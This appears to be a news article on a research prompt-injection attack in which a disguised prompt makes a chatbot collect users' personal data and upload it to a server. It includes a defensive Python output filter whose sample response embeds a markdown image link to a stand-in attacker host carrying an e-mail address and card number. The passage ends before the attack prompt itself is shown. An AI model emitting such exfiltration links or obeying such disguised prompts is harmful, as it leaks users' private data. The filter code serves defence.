Chatbot hack shows why you shouldn’t trust AI with your personal data


I told you from the early days of ChatGPT that you should avoid giving the chatbot data that’s too personal. First, companies like OpenAI might use your conversations with the AI to train future models. You don’t want any personal data in there.

Then there’s the risk of hacks targeting your chatbot. Hackers might find ways to target your chats with cleverly crafted prompts that will instruct the AI to feed them personal data from your interactions with the program.

A team of researchers managed to pull off the latter, creating a prompt that would instruct a chatbot to collect data from your chats and upload it to a server. The best part about the hack is that you’d input the prompt yourself, thinking that you’re actually using some sort of advanced prompt to help you with a specific task.

For example, hackers can disguise malicious prompts as prompts to write cover letters for job applications. That’s the sort of prompt you might search the web for yourself to improve the results from apps like ChatGPT.

According to Wired (via 9to5Mac), the attack was the result of a collaboration between researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore.

The researchers crafted a prompt that tells the AI to extract personal data, including names, ID numbers, credit card details, email addresses, mailing addresses, and other personal data, from the target’s chats with a chatbot.
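The attack described above only succeeds if the chatbot's reply is allowed to carry the harvested data out to an attacker-controlled server. One defensive control a chatbot operator can put in front of the user is an output filter that inspects every URL the model emits, decodes it, and blocks any link to a non-allowlisted host that embeds something looking like personal data. The following is an added example written for this article, not code from the researchers or from any chatbot vendor; the allowlist, the `attacker.invalid` host and the sample response are constructed assumptions, and the PII detectors cover only e-mail addresses and Luhn-valid card numbers from the categories the article lists.

```python
import re
from urllib.parse import urlparse, unquote

# Assumption: the only hosts this assistant is permitted to link to.
ALLOWED_HOSTS = {"example.com", "docs.example.com"}

URL_RE = re.compile(r"https?://[^\s)\]\"'<>]+")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# 13-19 digits, optionally separated by spaces or dashes.
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,19}\b")


def luhn_ok(digits: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def pii_kinds(text: str) -> list:
    """List the kinds of personal data found in text (e-mail, payment card)."""
    kinds = []
    if EMAIL_RE.search(text):
        kinds.append("email")
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            kinds.append("card")
            break
    return kinds


def scan_response(text: str) -> list:
    """Find URLs in a model response that would leak PII to a non-allowlisted host.

    Each URL is percent-decoded before inspection, because an exfiltration
    prompt can tell the model to URL-encode the stolen values.
    """
    findings = []
    for m in URL_RE.finditer(text):
        url = m.group()
        host = (urlparse(url).hostname or "").lower()
        kinds = pii_kinds(unquote(url))
        if host not in ALLOWED_HOSTS and kinds:
            findings.append({"url": url, "host": host, "pii": kinds})
    return findings


def sanitize_response(text: str):
    """Strip suspected exfiltration links from a response before rendering it."""
    findings = scan_response(text)
    for f in findings:
        text = text.replace(f["url"], "[link removed: suspected data exfiltration]")
    return text, findings


# Constructed sample: a response where an injected prompt made the model emit a
# markdown image whose URL carries the user's e-mail and card number.
SAMPLE_RESPONSE = (
    "Here is your cover letter draft.\n"
    "![](https://attacker.invalid/collect?e=jane%40example.com&c=4111111111111111)\n"
    "See also https://docs.example.com/cover-letters for formatting tips."
)

if __name__ == "__main__":
    cleaned, hits = sanitize_response(SAMPLE_RESPONSE)
    print(cleaned)
    print(hits)
```

Rendering the markdown image is what would trigger the upload in the user's browser, so the filter has to run before the response reaches the client. The allowlist is the more important half of the check: a link to an approved host is left alone even if it happens to contain an e-mail address, while a link to an unknown host carrying personal data is removed and logged for investigation.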

The prompt looks like this when seen in plain English: